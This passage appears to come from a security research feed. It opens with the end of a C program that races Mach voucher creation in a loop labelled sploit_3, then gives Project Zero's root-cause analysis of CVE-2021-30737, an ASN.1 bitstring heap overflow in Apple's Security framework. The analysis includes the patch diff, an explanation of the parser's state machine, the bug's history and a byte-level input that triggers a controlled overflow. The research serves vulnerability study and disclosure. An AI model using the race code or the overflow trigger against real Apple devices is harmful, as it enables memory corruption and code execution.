create_single_variable_userdata_voucher_recipe(void* buf, size_t len, size_t* template_size_out) {

    size_t recipe_size = (sizeof(mach_voucher_attr_recipe_data_t)) + len;

    mach_voucher_attr_recipe_data_t* recipe = calloc(recipe_size, 1);

    recipe->key = MACH_VOUCHER_ATTR_KEY_USER_DATA;

    recipe->command = MACH_VOUCHER_ATTR_USER_DATA_STORE;

    recipe->content_size = len;

    uint8_t* content_buf = ((uint8_t*)recipe)+sizeof(mach_voucher_attr_recipe_data_t);

    memcpy(content_buf, buf, len);

    *template_size_out = recipe_size;

    return recipe;

}

static void*

create_single_variable_userdata_then_redeem_voucher_recipe(void* buf, size_t len, size_t* template_size_out) {

    size_t recipe_size = (2*sizeof(mach_voucher_attr_recipe_data_t)) + len;

    mach_voucher_attr_recipe_data_t* recipe = calloc(recipe_size, 1);

    recipe->key = MACH_VOUCHER_ATTR_KEY_USER_DATA;

    recipe->command = MACH_VOUCHER_ATTR_USER_DATA_STORE;

    recipe->content_size = len;

   

    uint8_t* content_buf = ((uint8_t*)recipe)+sizeof(mach_voucher_attr_recipe_data_t);

    memcpy(content_buf, buf, len);

    mach_voucher_attr_recipe_data_t* recipe2 = (mach_voucher_attr_recipe_data_t*)(content_buf + len);

    recipe2->key = MACH_VOUCHER_ATTR_KEY_USER_DATA;

    recipe2->command = MACH_VOUCHER_ATTR_REDEEM;

    *template_size_out = recipe_size;

    return recipe;

}

struct recipe_template_meta {

    void* recipe;

    size_t recipe_size;

};

struct recipe_template_meta single_recipe_template = {};

struct recipe_template_meta redeem_recipe_template = {};

int iter_limit = 100000;

void* s3threadfunc(void* arg) {

    struct recipe_template_meta* template = (struct recipe_template_meta*)arg;

    for (int i = 0; i < iter_limit; i++) {

        mach_port_t voucher_port = create_voucher_from_recipe(template->recipe, template->recipe_size);

        mach_port_deallocate(mach_task_self(), voucher_port);

    }

    return NULL;

}

void sploit_3() {

    while(1) {

        // choose a userdata size:

        uint32_t userdata_size = (arc4random() % 2040)+8;

        userdata_size += 7;

        userdata_size &= (~7);

        printf("userdata size: 0x%x\n", userdata_size);

        uint8_t* userdata_buffer = calloc(userdata_size, 1);

        ((uint32_t*)userdata_buffer)[0] = arc4random();

        ((uint32_t*)userdata_buffer)[1] = arc4random();

        // build the templates:

        single_recipe_template.recipe = create_single_variable_userdata_voucher_recipe(userdata_buffer, userdata_size, &single_recipe_template.recipe_size);

        redeem_recipe_template.recipe = create_single_variable_userdata_then_redeem_voucher_recipe(userdata_buffer, userdata_size, &redeem_recipe_template.recipe_size);

        free(userdata_buffer);

        pthread_t single_recipe_thread;

        pthread_create(&single_recipe_thread, NULL, s3threadfunc, (void*)&single_recipe_template);

        pthread_t redeem_recipe_thread;

        pthread_create(&redeem_recipe_thread, NULL, s3threadfunc, (void*)&redeem_recipe_template);

        pthread_join(single_recipe_thread, NULL);

        pthread_join(redeem_recipe_thread, NULL);

        free(single_recipe_template.recipe);

        free(redeem_recipe_template.recipe);

    }

}

int main(int argc, char** argv) {

    sploit_3();

}

CVE-2021-30737, @xerub's 2021 iOS ASN.1 Vulnerability

By: Anonymous
7 April 2022 at 16:08

Posted by Ian Beer, Google Project Zero

This blog post is my analysis of a vulnerability found by @xerub. Phrack published @xerub's writeup so go check that out first.

As well as doing my own vulnerability research I also spend time trying as best as I can to keep up with the public state-of-the-art, especially when details of a particularly interesting vulnerability are announced or a new in-the-wild exploit is caught. Originally this post was just a series of notes I took last year as I was trying to understand this bug. But the bug itself and the narrative around it are so fascinating that I thought it would be worth writing up these notes into a more coherent form to share with the community.

Background

On April 14th 2021 the Washington Post published an article on the unlocking of the San Bernardino iPhone by Azimuth containing a nugget of non-public information:

"Azimuth specialized in finding significant vulnerabilities. Dowd [...] had found one in open-source code from Mozilla that Apple used to permit accessories to be plugged into an iPhone’s lightning port, according to the person."

There's not that much Mozilla code running on an iPhone and even less which is likely to be part of such an attack surface. Therefore, if accurate, this quote almost certainly meant that Azimuth had exploited a vulnerability in the ASN.1 parser used by Security.framework, which is a fork of Mozilla's NSS ASN.1 parser.

I searched around in bugzilla (Mozilla's issue tracker) looking for candidate vulnerabilities which matched the timeline discussed in the Post article and narrowed it down to a handful of plausible bugs including: 1202868, 1192028, 1245528.

I was surprised that there had been so many exploitable-looking issues in the ASN.1 code and decided to add auditing the NSS ASN.1 parser as an quarterly goal.

A month later, having predictably done absolutely nothing more towards that goal, I saw this tweet from @xerub:

@xerub: CVE-2021-30737 is pretty bad. Please update ASAP. (Shameless excerpt from the full chain source code) 4:00 PM - May 25, 2021

@xerub: CVE-2021-30737 is pretty bad. Please update ASAP. (Shameless excerpt from the full chain source code) 4:00 PM - May 25, 2021

The shameless excerpt reads:

// This is the real deal. Take no chances, take no prisoners! I AM THE STATE MACHINE!

And CVE-2021-30737, fixed in iOS 14.6 was described in the iOS release notes as:

Screenshot of text. Transcript: Security. Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation). Impact: Processing a maliciously crafted certificate may lead to arbitrary code execution. Description: A memory corruption issue in the ASN.1 decoder was addressed by removing the vulnerable code. CVE-2021-30737: xerub

Impact: Processing a maliciously crafted certification may lead to arbitrary code execution

Description: A memory corruption issue in the ASN.1 decoder was addressed by removing the vulnerable code.

Feeling slightly annoyed that I hadn't acted on my instincts as there was clearly something awesome lurking there I made a mental note to diff the source code once Apple released it which they finally did a few weeks later on opensource.apple.com in the Security package.

Here's the diff between the MacOS 11.4 and 11.3 versions of secasn1d.c which contains the ASN.1 parser:

diff --git a/OSX/libsecurity_asn1/lib/secasn1d.c b/OSX/libsecurity_asn1/lib/secasn1d.c

index f338527..5b4915a 100644

--- a/OSX/libsecurity_asn1/lib/secasn1d.c

+++ b/OSX/libsecurity_asn1/lib/secasn1d.c

@@ -434,9 +434,6 @@ loser:

         PORT_ArenaRelease(cx->our_pool, state->our_mark);

         state->our_mark = NULL;

     }

-    if (new_state != NULL) {

-        PORT_Free(new_state);

-    }

     return NULL;

 }

 

@@ -1794,19 +1791,13 @@ sec_asn1d_parse_bit_string (sec_asn1d_state *state,

     /*PORT_Assert (state->pending > 0); */

     PORT_Assert (state->place == beforeBitString);

 

-    if ((state->pending == 0) || (state->contents_length == 1)) {

+    if (state->pending == 0) {

                if (state->dest != NULL) {

                        SecAsn1Item *item = (SecAsn1Item *)(state->dest);

                        item->Data = NULL;

                        item->Length = 0;

                        state->place = beforeEndOfContents;

-               }

-               if(state->contents_length == 1) {

-                       /* skip over (unused) remainder byte */

-                       return 1;

-               }

-               else {

-                       return 0;

+            return 0;

                }

     }

The first change (removing the PORT_Free) is immaterial for Apple's use case as it's fixing a double free which doesn't impact Apple's build. It's only relevant when "allocator marks" are enabled and this feature is disabled.

The vulnerability must therefore be in sec_asn1d_parse_bit_string. We know from xerub's tweet that something goes wrong with a state machine, but to figure it out we need to cover some ASN.1 basics and then start looking at how the NSS ASN.1 state machine works.

ASN.1 encoding

ASN.1 is a Type-Length-Value serialization format, but with the neat quirk that it can also handle the case when you don't know the length of the value, but want to serialize it anyway! That quirk is only possible when ASN.1 is encoded according to Basic Encoding Rules (BER.) There is a stricter encoding called DER (Distinguished Encoding Rules) which enforces that a particular value only has a single correct encoding and disallows the cases where you can serialize values without knowing their eventual lengths.

This page is a nice beginner's guide to ASN.1. I'd really recommend skimming that to get a good overview of ASN.1.

There are a lot of built-in types in ASN.1. I'm only going to describe the minimum required to understand this vulnerability (mostly because I don't know any more than that!) So let's just start from the very first byte of a serialized ASN.1 object and figure out how to decode it:

This first byte tells you the type, with the least significant 5 bits defining the type identifier. The special type identifier value of 0x1f tells you that the type identifier doesn't fit in those 5 bits and is instead encoded in a different way (which we'll ignore):

Diagram showing first two bytes of a serialized ASN.1 object. The first byte in this case is the type and class identifier and the second is the length.

Diagram showing first two bytes of a serialized ASN.1 object. The first byte in this case is the type and class identifier and the second is the length.

The upper two bits of the first byte tell you the class of the type: universal, application, content-specific or private. For us, we'll leave that as 0 (universal.)

Bit 6 is where the fun starts. A value of 1 tells us that this is a primitive encoding which means that following the length are content bytes which can be directly interpreted as the intended type. For example, a primitive encoding of the string "HELLO" as an ASN.1 printable string would have a length byte of 5 followed by the ASCII characters "HELLO". All fairly straightforward.

A value of 0 for bit 6 however tells us that this is a constructed encoding. This means that the bytes following the length are not the "raw" content bytes for the type but are instead ASN.1 encodings of one or more "chunks" which need to be individually parsed and concatenated to form the final output value. And to make things extra complicated it's also possible to specify a length value of 0 which means that you don't even know how long the reconstructed output will be or how much of the subsequent input will be required to completely build the output.

This final case (of a constructed type with indefinite length) is known as indefinite form. The end of the input which makes up a single indefinite value is signaled by a serialized type with the identifier, constructed, class and length values all equal to 0 , which is encoded as two NULL bytes.

ASN.1 bitstrings

Most of the ASN.1 string types require no special treatment; they're just buffers of raw bytes. Some of them have length restrictions. For example: a BMP string must have an even length and a UNIVERSAL string must be a multiple of 4 bytes in length, but that's about it.

ASN.1 bitstrings are strings of bits as opposed to bytes. You could for example have a bitstring with a length of a single bit (so either a 0 or 1) or a bitstring with a length of 127 bits (so 15 full bytes plus an extra 7 bits.)

Encoded ASN.1 bitstrings have an extra metadata byte after the length but before the contents, which encodes the number of unused bits in the final byte.

Diagram showing the complete encoding of a 3-bit bitstring. The length of 2 includes the unused-bits count byte which has a value of 5, indicating that only the 3 most-significant bits of the final byte are valid.

Diagram showing the complete encoding of a 3-bit bitstring. The length of 2 includes the unused-bits count byte which has a value of 5, indicating that only the 3 most-significant bits of the final byte are valid.

Parsing ASN.1

ASN.1 data always needs to be decoded in tandem with a template that tells the parser what data to expect and also provides output pointers to be filled in with the parsed output data. Here's the template my test program uses to exercise the bitstring code:

const SecAsn1Template simple_bitstring_template[] = {

  {

    SEC_ASN1_BIT_STRING | SEC_ASN1_MAY_STREAM, // kind: bit string,

                                         //  may be constructed

    0,     // offset: in dest/src

    NULL,  // sub: subtemplate for indirection

    sizeof(SecAsn1Item) // size: of output structure

  }

};

A SecASN1Item is a very simple wrapper around a buffer. We can provide a SecAsn1Item for the parser to use to return the parsed bitstring then call the parser:

SecAsn1Item decoded = {0};

PLArenaPool* pool = PORT_NewArena(1024);

SECStatus status =

  SEC_ASN1Decode(pool,     // pool: arena for destination allocations

                 &decoded, // dest: decoded encoded items in to here

                 &simple_bitstring_template, // template

                 asn1_bytes,      // buf: asn1 input bytes

                 asn1_bytes_len); // len: input size

NSS ASN.1 state machine

The state machine has two core data structures:

SEC_ASN1DecoderContext - the overall parsing context

sec_asn1d_state - a single parser state, kept in a doubly-linked list forming a stack of nested states

Here's a trimmed version of the state object showing the relevant fields:

typedef struct sec_asn1d_state_struct {

  SEC_ASN1DecoderContext *top; 

  const SecAsn1Template *theTemplate;

  void *dest;

 

  struct sec_asn1d_state_struct *parent;

  struct sec_asn1d_state_struct *child;

 

  sec_asn1d_parse_place place;

 

  unsigned long contents_length;

  unsigned long pending;

  unsigned long consumed;

  int depth;

} sec_asn1d_state;

The main engine of the parsing state machine is the method SEC_ASN1DecoderUpdate which takes a context object, raw input buffer and length:

SECStatus

SEC_ASN1DecoderUpdate (SEC_ASN1DecoderContext *cx,

                       const char *buf, size_t len)

The current state is stored in the context object's current field, and that current state's place field determines the current state which the parser is in. Those states are defined here:

​​typedef enum {

    beforeIdentifier,

    duringIdentifier,

    afterIdentifier,

    beforeLength,

    duringLength,

    afterLength,

    beforeBitString,

    duringBitString,

    duringConstructedString,

    duringGroup,

    duringLeaf,

    duringSaveEncoding,

    duringSequence,

    afterConstructedString,

    afterGroup,

    afterExplicit,

    afterImplicit,

    afterInline,

    afterPointer,

    afterSaveEncoding,

    beforeEndOfContents,

    duringEndOfContents,

    afterEndOfContents,

    beforeChoice,

    duringChoice,

    afterChoice,

    notInUse

} sec_asn1d_parse_place;

The state machine loop switches on the place field to determine which method to call:

  switch (state->place) {

    case beforeIdentifier:

      consumed = sec_asn1d_parse_identifier (state, buf, len);

      what = SEC_ASN1_Identifier;

      break;

    case duringIdentifier:

      consumed = sec_asn1d_parse_more_identifier (state, buf, len);

      what = SEC_ASN1_Identifier;

      break;

    case afterIdentifier:

      sec_asn1d_confirm_identifier (state);

      break;

...

Each state method which could consume input is passed a pointer (buf) to the next unconsumed byte in the raw input buffer and a count of the remaining unconsumed bytes (len).

It's then up to each of those methods to return how much of the input they consumed, and signal any errors by updating the context object's status field.

The parser can be recursive: a state can set its ->place field to a state which expects to handle a parsed child state and then allocate a new child state. For example when parsing an ASN.1 sequence:

  state->place = duringSequence;

  state = sec_asn1d_push_state (state->top, state->theTemplate + 1,

                                state->dest, PR_TRUE);

The current state sets its own next state to duringSequence then calls sec_asn1d_push_state which allocates a new state object, with a new template and a copy of the parent's dest field.

sec_asn1d_push_state updates the context's current field such that the next loop around SEC_ASN1DecoderUpdate will see this child state as the current state:

    cx->current = new_state;

Note that the initial value of the place field (which determines the current state) of the newly allocated child is determined by the template. The final state in the state machine path followed by that child will then be responsible for popping itself off the state stack such that the duringSequence state can be reached by its parent to consume the results of the child.

Buffer management

The buffer management is where the NSS ASN.1 parser starts to get really mind bending. If you read through the code you will notice an extreme lack of bounds checks when the output buffers are being filled in - there basically are none. For example, sec_asn1d_parse_leaf which copies the raw encoded string bytes for example simply memcpy's into the output buffer with no bounds checks that the length of the string matches the size of the buffer.

Rather than using explicit bounds checks to ensure lengths are valid, the memory safety is instead supposed to be achieved by relying on the fact that decoding valid ASN.1 can never produce output which is larger than its input.

That is, there are no forms of decompression or input expansion so any parsed output data must be equal to or shorter in length than the input which encoded it. NSS leverages this and over-allocates all output buffers to simply be as large as their inputs.

For primitive strings this is quite simple: the length and input are provided so there's nothing really to go that wrong. But for constructed strings this gets a little fiddly...

One way to think of constructed strings is as trees of substrings, nested up to 32-levels deep. Here's an example:

An outer constructed definite length string with three children: a primitive string "abc", a constructed indefinite length string and a primitive string "ghi". The constructed indefinite string has two children, a primitive string "def" and an end-of-contents marker.

An outer constructed definite length string with three children: a primitive string "abc", a constructed indefinite length string and a primitive string "ghi". The constructed indefinite string has two children, a primitive string "def" and an end-of-contents marker.

We start with a constructed definite length string. The string's length value L is the complete size of the remaining input which makes up this string; that number of input bytes should be parsed as substrings and concatenated to form the parsed output.

At this point the NSS ASN.1 string parser allocates the output buffer for the parsed output string using the length L of that first input string. This buffer is an over-allocated worst case. The part which makes it really fun though is that NSS allocates the output buffer then promptly throws away that length! This might not be so obvious from quickly glancing through the code though. The buffer which is allocated is stored as the Data field of a buffer wrapper type:

typedef struct cssm_data {

    size_t Length;

    uint8_t * __nullable Data;

} SecAsn1Item, SecAsn1Oid;

(Recall that we passed in a pointer to a SecAsn1Item in the template; it's the Data field of that which gets filled in with the allocated string buffer pointer here. This type is very slightly different between NSS and Apple's fork, but the difference doesn't matter here.)

That Length field is not the size of the allocated Data buffer. It's a (type-specific) count which determines how many bits or bytes of the buffer pointed to by Data are valid. I say type-specific because for bit-strings Length is stored in units of bits but for other strings it's in units of bytes. (CVE-2016-1950 was a bug in NSS where the code mixed up those units.)

Rather than storing the allocated buffer size along with the buffer pointer, each time a substring/child string is encountered the parser walks back up the stack of currently-being-parsed states to find the inner-most definite length string. As it's walking up the states it examines each state to determine how much of its input it has consumed in order to be able to determine whether it's the case that the current to-be-parsed substring is indeed completely enclosed within the inner-most enclosing definite length string.

If that sounds complicated, it is! The logic which does this is here, and it took me a good few days to pull it apart enough to figure out what this was doing:

sec_asn1d_state *parent = sec_asn1d_get_enclosing_construct(state);

while (parent && parent->indefinite) {

  parent = sec_asn1d_get_enclosing_construct(parent);

}

unsigned long remaining = parent->pending;

parent = state;

do {

  if (!sec_asn1d_check_and_subtract_length(&remaining,

                                           parent->consumed,

                                           state->top)

      ||

      /* If parent->indefinite is true, parent->contents_length is

       * zero and this is a no-op. */

      !sec_asn1d_check_and_subtract_length(&remaining,

                                           parent->contents_length,

                                           state->top)

      ||

      /* If parent->indefinite is true, then ensure there is enough

       * space for an EOC tag of 2 bytes. */

      (  parent->indefinite

          &&

          !sec_asn1d_check_and_subtract_length(&remaining,

                                               2,

                                               state->top)

      )

    ) {

      /* This element is larger than its enclosing element, which is

       * invalid. */

       return;

    }

} while ((parent = sec_asn1d_get_enclosing_construct(parent))

         &&

         parent->indefinite);

It first walks up the state stack to find the innermost constructed definite state and uses its state->pending value as an upper bound. It then walks the state stack again and for each in-between state subtracts from that original value of pending how many bytes could have been consumed by those in between states. It's pretty clear that the pending value is therefore vitally important; it's used to determine an upper bound so if we could mess with it this "bounds check" could go wrong.

After figuring out that this was pretty clearly the only place where any kind of bounds checking takes place I looked back at the fix more closely.

We know that sec_asn1d_parse_bit_string is only the function which changed:

static unsigned long

sec_asn1d_parse_bit_string (sec_asn1d_state *state,

                            const char *buf, unsigned long len)

{

    unsigned char byte;

   

    /*PORT_Assert (state->pending > 0); */

    PORT_Assert (state->place == beforeBitString);

    if ((state->pending == 0) || (state->contents_length == 1)) {

        if (state->dest != NULL) {

            SecAsn1Item *item = (SecAsn1Item *)(state->dest);

            item->Data = NULL;

            item->Length = 0;

            state->place = beforeEndOfContents;

        }

        if(state->contents_length == 1) {

            /* skip over (unused) remainder byte */

            return 1;

        }

        else {

            return 0;

        }

    }

   

    if (len == 0) {

        state->top->status = needBytes;

        return 0;

    }

   

    byte = (unsigned char) *buf;

    if (byte > 7) {

        dprintf("decodeError: parse_bit_string remainder oflow\n");

        PORT_SetError (SEC_ERROR_BAD_DER);

        state->top->status = decodeError;

        return 0;

    }

   

    state->bit_string_unused_bits = byte;

    state->place = duringBitString;

    state->pending -= 1;

   

    return 1;

}

The highlighted region of the function are the characters which were removed by the patch. This function is meant to return the number of input bytes (pointed to by buf) which it consumed and my initial hunch was to notice that the patch removed a path through this function where you could get the count of input bytes consumed and pending out-of-sync. It should be the case that when they return 1 in the removed code they also decrement state->pending, as they do in the other place where this function returns 1.

I spent quite a while trying to figure out how you could actually turn that into something useful but in the end I don't think you can.

So what else is going on here?

This state is reached with buf pointing to the first byte after the length value of a primitive bitstring. state->contents_length is the value of that parsed length. Bitstrings, as discussed earlier, are a unique ASN.1 string type in that they have an extra meta-data byte at the beginning (the unused-bits count byte.) It's perfectly fine to have a definite zero-length string - indeed that's (sort-of) handled earlier than this in the prepareForContents state, which short-circuits straight to afterEndOfContents:

if (state->contents_length == 0 && (! state->indefinite)) {

  /*

   * A zero-length simple or constructed string; we are done.

   */

  state->place = afterEndOfContents;

Here they're detecting a definite-length string type with a content length of 0. But this doesn't handle the edge case of a bitstring which consists only of the unused-bits count byte. The state->contents_length value of that bitstring will be 1, but it doesn't actually have any "contents".

It's this case which the (state->contents_length == 1) conditional in sec_asn1d_parse_bit_string matches:

    if ((state->pending == 0) || (state->contents_length == 1)) {

        if (state->dest != NULL) {

            SecAsn1Item *item = (SecAsn1Item *)(state->dest);

            item->Data = NULL;

            item->Length = 0;

            state->place = beforeEndOfContents;

        }

        if(state->contents_length == 1) {

            /* skip over (unused) remainder byte */

            return 1;

        }

        else {

            return 0;

        }

    }

By setting state->place to beforeEndOfContents they are again trying to short-circuit the state machine to skip ahead to the state after the string contents have been consumed. But here they take an additional step which they didn't take when trying to achieve exactly the same thing in prepareForContents. In addition to updating state->place they also NULL out the dest SecAsn1Item's Data field and set the Length to 0.

I mentioned earlier that the new child states which are allocated to recursively parse the sub-strings of constructed strings get a copy of the parent's dest field (which is a pointer to a pointer to the output buffer.) This makes sense: that output buffer is only allocated once then gets recursively filled-in in a linear fashion by the children. (Technically this isn't actually how it works if the outermost string is indefinite length, there's separate handling for that case which instead builds a linked-list of substrings which are eventually concatenated, see sec_asn1d_concat_substrings.)

If the output buffer is only allocated once, what happens if you set Data to NULL like they do here? Taking a step back, does that actually make any sense at all?

No, I don't think it makes any sense. Setting Data to NULL at this point should at the very least cause a memory leak, as it's the only pointer to the output buffer.

The fun part though is that that's not the only consequence of NULLing out that pointer. item->Data is used to signal something else.

Here's a snippet from prepare_for_contents when it's determining whether there's enough space in the output buffer for this substring

} else if (state->substring) {

  /*

   * If we are a substring of a constructed string, then we may

   * not have to allocate anything (because our parent, the

   * actual constructed string, did it for us).  If we are a

   * substring and we *do* have to allocate, that means our

   * parent is an indefinite-length, so we allocate from our pool;

   * later our parent will copy our string into the aggregated

   * whole and free our pool allocation.

   */

  if (item->Data == NULL) {

    PORT_Assert (item->Length == 0);

    poolp = state->top->our_pool;

  } else {

    alloc_len = 0;

  }

As the comment implies, if both item->Data is NULL at this point and state->substring is true, then (they believe) it must be the case that they are currently parsing a substring of an outer-level indefinite string, which has no definite-sized buffer already allocated. In that case the meaning of the item->Data pointer is different to that which we describe earlier: it's merely a temporary buffer meant to hold only this substring. Just above here alloc_len was set to the content length of this substring; and for the outer-definite-length case it's vitally important that alloc_len then gets set to 0 here (which is really indicating that a buffer has already been allocated and they must not allocate a new one.)

To emphasize the potentially subtle point: the issue is that using this conjunction (state->substring && !item->Data) for determining whether this a substring of a definite length or outer-level-indefinite string is not the same as the method used by the convoluted bounds checking code we saw earlier. That method walks up the current state stack and checks the indefinite bits of the super-strings to determine whether they're processing a substring of an outer-level-indefinite string.

Putting that all together, you might be able to see where this is going... (but it is still pretty subtle.)

Assume that we have an outer definite-length constructed bitstring with three primitive bitstrings as substrings:

Upon encountering the first outer-most definite length constructed bitstring, the code will allocate a fixed-size buffer, large enough to store all the remaining input which makes up this string, which in this case is 42 bytes. At this point dest->Data points to that buffer.

They then allocate a child state, which gets a copy of the dest pointer (not a copy of the dest SecAsn1Item object; a copy of a pointer to it), and proceed to parse the first child substring.

This is a primitive bitstring with a length of 1 which triggers the vulnerable path in sec_asn1d_parse_bit_string and sets dest->Data to NULL. The state machine skips ahead to beforeEndOfContents then eventually the next substring gets parsed - this time with dest->Data == NULL.

Now the logic goes wrong in a bad way and, as we saw in the snippet above, a new dest->Data buffer gets allocated which is the size of only this substring (2 bytes) when in fact dest->Data should already point to a buffer large enough to hold the entire outer-level-indefinite input string. This bitstring's contents then get parsed and copied into that buffer.

Now we come to the third substring. dest->Data is no longer NULL; but the code now has no way of determining that the buffer was in fact only (erroneously) allocated to hold a single substring. It believes the invariant that item->Data only gets allocated once, when the first outer-level definite length string is encountered, and it's that fact alone which it uses to determine whether dest->Data points to a buffer large enough to have this substring appended to it. It then happily appends this third substring, writing outside the bounds of the buffer allocated to store only the second substring.

This gives you a great memory corruption primitive: you can cause allocations of a controlled size and then overflow them with an arbitrary number of arbitrary bytes.

Here's an example encoding for an ASN.1 bitstring which triggers this issue:

   uint8_t concat_bitstrings_constructed_definite_with_zero_len_realloc[]

        = {ASN1_CLASS_UNIVERSAL | ASN1_CONSTRUCTED | ASN1_BIT_STRING, // (0x23)

           0x4a, // initial allocation size

           ASN1_CLASS_UNIVERSAL | ASN1_PRIMITIVE | ASN1_BIT_STRING,

           0x1, // force item->Data = NULL

           0x0, // number of unused bits in the final byte

           ASN1_CLASS_UNIVERSAL | ASN1_PRIMITIVE | ASN1_BIT_STRING,

           0x2, // this is the reallocation size

           0x0, // number of unused bits in the final byte

           0xff, // only byte of bitstring

           ASN1_CLASS_UNIVERSAL | ASN1_PRIMITIVE | ASN1_BIT_STRING,

           0x41, // 64 actual bytes, plus the remainder, will cause 0x40 byte memcpy one byte in to 2 byte allocation

           0x0, // number of unused bits in the final byte

           0xff,

           0xff,// -- continues for overflow

Why wasn't this found by fuzzing?

This is a reasonable question to ask. This source code is really really hard to audit, even with the diff it was at least a week of work to figure out the true root cause of the bug. I'm not sure if I would have spotted this issue during a code audit. It's very broken but it's quite subtle and you have to figure out a lot about the state machine and the bounds-checking rules to see it - I think I might have given up before I figured it out and gone to look for something easier.

But the trigger test-case is neither structurally complex nor large, and feels within-grasp for a fuzzer. So why wasn't it found? I'll offer two points for discussion:

Perhaps it's not being fuzzed?

Or at least, it's not being fuzzed in the exact form which it appears in Apple's Security.framework library. I understand that both Mozilla and Google do fuzz the NSS ASN.1 parser and have found a bunch of vulnerabilities, but note that the key part of the vulnerable code ("|| (state->contents_length == 1" in sec_asn1d_parse_bit_string) isn't present in upstream NSS (more on that below.)

Can it be fuzzed effectively?

Even if you did build the Security.framework version of the code and used a coverage guided fuzzer, you might well not trigger any crashes. The code uses a custom heap allocator and you'd have to either replace that with direct calls to the system allocator or use ASAN's custom allocator hooks. Note that upstream NSS does do that, but as I understand it, Apple's fork doesn't.

History

I'm always interested in not just understanding how a vulnerability works but how it was introduced. This case is a particularly compelling example because once you understand the bug, the code construct initially looks extremely suspicious. It only exists in Apple's fork of NSS and the only impact of that change is to introduce a perfect memory corruption primitive. But let's go through the history of the code to convince ourselves that it is much more likely that it was just an unfortunate accident:

The earliest reference to this code I can find is this, which appears to be the initial checkin in the Mozilla CVS repo on March 31, 2000:

static unsigned long

sec_asn1d_parse_bit_string (sec_asn1d_state *state,

                            const char *buf, unsigned long len)

{

    unsigned char byte;

    PORT_Assert (state->pending > 0);

    PORT_Assert (state->place == beforeBitString);

    if (len == 0) {

        state->top->status = needBytes;

        return 0;

    }

    byte = (unsigned char) *buf;

    if (byte > 7) {

        PORT_SetError (SEC_ERROR_BAD_DER);

        state->top->status = decodeError;

        return 0;

    }

    state->bit_string_unused_bits = byte;

    state->place = duringBitString;

    state->pending -= 1;

    return 1;

}

On August 24th, 2001 the form of the code changed to something like the current version, in this commit with the message "Memory leak fixes.":

static unsigned long

sec_asn1d_parse_bit_string (sec_asn1d_state *state,

                            const char *buf, unsigned long len)

{

    unsigned char byte;

-   PORT_Assert (state->pending > 0);

    /*PORT_Assert (state->pending > 0); */

    PORT_Assert (state->place == beforeBitString);

+   if (state->pending == 0) {

+       if (state->dest != NULL) {

+           SECItem *item = (SECItem *)(state->dest);

+           item->data = NULL;

+           item->len = 0;

+           state->place = beforeEndOfContents;

+           return 0;

+       }

+   }

    if (len == 0) {

        state->top->status = needBytes;

        return 0;

    }

    byte = (unsigned char) *buf;

    if (byte > 7) {

        PORT_SetError (SEC_ERROR_BAD_DER);

        state->top->status = decodeError;

        return 0;

    }

    state->bit_string_unused_bits = byte;

    state->place = duringBitString;

    state->pending -= 1;

    return 1;

}

This commit added the item->data = NULL line but here it's only reachable when pending == 0. I am fairly convinced that this was dead code and not actually reachable (and that the PORT_Assert which they commented out was actually valid.)

The beforeBitString state (which leads to the sec_asn1d_parse_bit_string method being called) will always be preceded by the afterLength state (implemented by sec_asn1d_prepare_for_contents.) On entry to the afterLength state state->contents_length is equal to the parsed length field and  sec_asn1d_prepare_for_contents does:

state->pending = state->contents_length;

So in order to reach sec_asn1d_parse_bit_string with state->pending == 0, state->contents_length would also need to be 0 in sec_asn1d_prepare_for_contents.

That means that in the if/else decision tree below, at least one of the two conditionals must be true:

        if (state->contents_length == 0 && (! state->indefinite)) {

            /*

             * A zero-length simple or constructed string; we are done.

             */

            state->place = afterEndOfContents;

...

        } else if (state->indefinite) {

            /*

             * An indefinite-length string *must* be constructed!

             */

            dprintf("decodeError: prepare for contents indefinite not construncted\n");

            PORT_SetError (SEC_ERROR_BAD_DER);

            state->top->status = decodeError;

yet it is required that neither of those be true in order to reach the final else which is the only path to reaching sec_asn1d_parse_bit_string via the beforeBitString state:

        } else {

            /*

             * A non-zero-length simple string.

             */

            if (state->underlying_kind == SEC_ASN1_BIT_STRING)

                state->place = beforeBitString;

            else

                state->place = duringLeaf;

        }

So at that point (24 August 2001) the NSS codebase had some dead code which looked like it was trying to handle parsing an ASN.1 bitstring which didn't have an unused-bits byte. As we've seen in the rest of this post though, that handling is quite wrong, but it didn't matter as the code was unreachable.

The earliest reference to Apple's fork of that NSS code I can find is in the SecurityNssAsn1-11 package for OS X 10.3 (Panther) which would have been released October 24th, 2003. In that project we can find a CHANGES.apple file which tells us a little more about the origins of Apple's fork:

General Notes

-------------

1. This module, SecurityNssAsn1, is based on the Netscape Security

   Services ("NSS") portion of the Mozilla Browser project. The

   source upon which SecurityNssAsn1 was based was pulled from

   the Mozilla CVS repository, top of tree as of January 21, 2003.

   The SecurityNssAsn1 project contains only those portions of NSS

   used to perform BER encoding and decoding, along with minimal

   support required by the encode/decode routines.

2. The directory structure of SecurityNssAsn1 differs significantly

   from that of NSS, rendering simple diffs to document changes

   unwieldy. Diffs could still be performed on a file-by-file basis.

   

3. All Apple changes are flagged by the symbol __APPLE__, either

   via "#ifdef __APPLE__" or in a comment.

That document continues on to outline a number of broad changes which Apple made to the code, including reformatting the code and changing a number of APIs to add new features. We also learn the date at which Apple forked the code (January 21, 2003) so we can go back through a github mirror of the mozilla CVS repository to find the version of secasn1d.c as it would have appeared then and diff them.

From that diff we can see that the Apple developers actually made fairly significant changes in this initial import, indicating that this code underwent some level of review prior to importing it. For example:

@@ -1584,7 +1692,15 @@

     /*

      * If our child was just our end-of-contents octets, we are done.

      */

+       #ifdef  __APPLE__

+       /*

+        * Without the check for !child->indefinite, this path could

+        * be taken erroneously if the child is indefinite!

+        */

+       if(child->endofcontents && !child->indefinite) {

+       #else

     if (child->endofcontents) {

They were pretty clearly looking for potential correctness issues with the code while they were refactoring it. The example shown above is a non-trivial change and one which persists to this day. (And I have no idea whether the NSS or Apple version is correct!) Reading the diff we can see that not every change ended up being marked with #ifdef __APPLE__ or a comment. They also made this change to sec_asn1d_parse_bit_string:

@@ -1372,26 +1469,33 @@

     /*PORT_Assert (state->pending > 0); */

     PORT_Assert (state->place == beforeBitString);

 

-    if (state->pending == 0) {

-       if (state->dest != NULL) {

-           SECItem *item = (SECItem *)(state->dest);

-           item->data = NULL;

-           item->len = 0;

-           state->place = beforeEndOfContents;

-           return 0;

-       }

+    if ((state->pending == 0) || (state->contents_length == 1)) {

+               if (state->dest != NULL) {

+                       SECItem *item = (SECItem *)(state->dest);

+                       item->Data = NULL;

+                       item->Length = 0;

